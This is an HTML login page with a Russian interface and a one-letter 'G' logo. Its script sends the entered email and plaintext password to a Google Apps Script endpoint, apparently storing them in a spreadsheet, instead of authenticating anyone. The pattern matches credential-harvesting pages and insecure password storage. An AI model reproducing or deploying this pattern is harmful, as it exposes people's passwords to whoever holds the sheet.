<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Логин</title>
    
		<style>
* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

body {
    margin: 0;
    padding: 0;
    height: 100%;
    background: linear-gradient(#8D464A, #271314);
    background-attachment: fixed;
}

.content {
    display: flex;
    justify-content: center;
    align-items: center;
    min-height: 100vh;
    padding: 0;
    box-sizing: border-box;
}

.fixed-header {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 13%;
    background-color: #000;
    color: white;
    display: flex;
    align-items: center;
    z-index: 1000;
}

.fixed-header .logo {
    width: 102px;
    height: 90px;
    font-size: 75px;
    margin: 0 5px;
}

.fixed-header .section-title {
    height: 54px;
    font-size: 45px;
    line-height: 54px;
}

.login-form {
    width: 853px;
    background: rgba(0,0,0,.8);
    padding: 40px;
    text-align: center; /* Центрирование текста внутри формы */
}

.login-form p {
    color: white;
    font-size: 35px;
    margin-bottom: 20px; /* Добавьте отступ снизу, если нужно */
}

.login-form input {
    width: 100%;
    padding: 15px;
    margin-bottom: 15px;
    outline: none;
    border: none;
	color: #280404;
}

.login-form button {
    width: 100%;
    height: 35px;
    outline: none;
    border: none;
    margin-top: 20px;
    cursor: pointer;
    transition: .5s;
}

.login-form button:hover {
    transform: scale(1.1);
    background: #0773ff;
    color: #fff;
}

#sendText {
    color: green;
    margin-top: 15px;
    display: block;
    text-align: center;
}
			
		</style>
    <script src="https://kit.fontawesome.com/bfec730d56.js" crossorigin="anonymous"></script>
	
</head>
<body>

    <div class="content">
			<div class="fixed-header">
				<a href="index.html" style="text-decoration: none; color: inherit;">
						<div class="logo">G</div>
				</a>
				<div class="section-title">Войти/Регистрация/Подписка на рассылку</div>
		</div>
		
        <form action="#" class="login-form" name="submit-to-google-sheet">
            <p>Авторизация</p> <!-- Надпись "Авторизация" теперь внутри формы -->

            <input type="email" name="email" id="email" autocomplete="off" placeholder="Логин: " required>

            <input type="password" name="password" id="password" autocomplete="off" placeholder="Пароль: " required>

            <button type="submit"><i class="fas fa-paper-plane"></i></button>

            <span id="sendText"></span>

        </form>
    </div>

    <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbw52IkQN1npHZd72BatayBGRGlolr1Dn3IsDCGthM_QsY8cZLhZatPiqmmq8Zm6H9dQGg/exec'
        const form = document.forms['submit-to-google-sheet']
        const sendText = document.getElementById('sendText')
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response =>{
                sendText.innerHTML = "Thank`s your data send success!"
                setTimeout(function(){
                    sendText.innerHTML = ""
                }, 5000)
                form.reset()
            })
            .catch(error => console.error('Error!', error.message))
        })
      </script>

</body>
</html>
